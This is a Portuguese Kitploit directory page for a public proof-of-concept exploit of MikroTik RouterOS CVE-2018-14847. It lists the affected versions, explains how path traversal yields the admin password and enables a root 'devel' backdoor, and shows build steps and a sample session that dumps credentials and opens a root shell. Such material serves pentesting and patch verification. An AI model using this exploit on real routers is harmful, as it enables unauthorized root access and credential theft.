Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
routeros-CVE-2018-14847-bytheway — By the Way é um exploit que permite um shell root em dispositivos Mikrotik rodando versões do RouterOS: | Kitploit
Ferramentas/GitHubGitHub/babyshen/routeros-cve-2018-14847-bytheway
Segurança de Sistemas EmbarcadosSegurança IoTAtaques de SenhaAnálise de VulnerabilidadesExploraçãoTestes de Penetração
GitHubbabyshen/routeros-cve-2018-14847-bytheway

routeros-CVE-2018-14847-bytheway

By the Way é um exploit que permite um shell root em dispositivos Mikrotik rodando versões do RouterOS:

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
42há 3 anosAinda não revisado

By the Way

By the Way é um exploit que permite obter um shell root em dispositivos Mikrotik rodando versões do RouterOS:

  • Longterm: 6.30.1 - 6.40.7
  • Stable: 6.29 - 6.42.0
  • Beta: 6.29rc1 - 6.43rc3

O exploit aproveita a vulnerabilidade de path traversal CVE-2018-14847 para extrair a senha do administrador e criar um pacote "option" para ativar o backdoor do desenvolvedor. Após a exploração, o atacante pode conectar-se via Telnet ou SSH usando o usuário root "devel" com a senha do administrador.

A Mikrotik corrigiu a CVE-2018-14847 em abril. No entanto, até este PoC ser escrito, acredito que não foi divulgado publicamente que o ataque pode ser usado para escrever arquivos. Você pode encontrar o aviso da Mikrotik aqui:

  • https://blog.mikrotik.com/security/winbox-vulnerability.html

Note que, embora este exploit seja escrito para Winbox, ele pode ser portado para HTTP desde que você tenha conhecimento prévio das credenciais do administrador.

Dependências

Este PoC depende de:

  • Boost 1.66
  • pthread
  • cmake

Instruções de Compilação

root@kitploit:~
mkdir build
cd build
cmake ..
make

Exemplo de Uso

root@kitploit:~
albinolobster@ubuntu:~/mikrotik/poc/bytheway/build$ telnet -l devel 192.168.1.251
Trying 192.168.1.251...
Connected to 192.168.1.251.
Escape character is '^]'.
Password: 
Login failed, incorrect username or password

Connection closed by foreign host.
albinolobster@ubuntu:~/mikrotik/poc/bytheway/build$ ./btw -i 192.168.1.251

   ╔╗ ┬ ┬  ┌┬┐┬ ┬┌─┐  ╦ ╦┌─┐┬ ┬
   ╠╩╗└┬┘   │ ├─┤├┤   ║║║├─┤└┬┘
   ╚═╝ ┴    ┴ ┴ ┴└─┘  ╚╩╝┴ ┴ ┴ 

[+] Extracting passwords from 192.168.1.251:8291
[+] Searching for administrator credentials 
[+] Using credentials - admin:lol
[+] Creating /pckg/option on 192.168.1.251:8291
[+] Creating /flash/nova/etc/devel-login on 192.168.1.251:8291
[+] There's a light on
albinolobster@ubuntu:~/mikrotik/poc/bytheway/build$ telnet -l devel 192.168.1.251
Trying 192.168.1.251...
Connected to 192.168.1.251.
Escape character is '^]'.
Password: 


BusyBox v1.00 (2017.03.02-08:29+0000) Built-in shell (ash)
Enter 'help' for a list of built-in commands.

# uname -a
Linux MikroTik 3.3.5 #1 Thu Mar 2 08:16:25 UTC 2017 mips unknown
# cat /rw/logs/VERSION
v6.38.4 Mar/08/2017 09:26:17
# Connection closed by foreign host.
Baixar ferramenta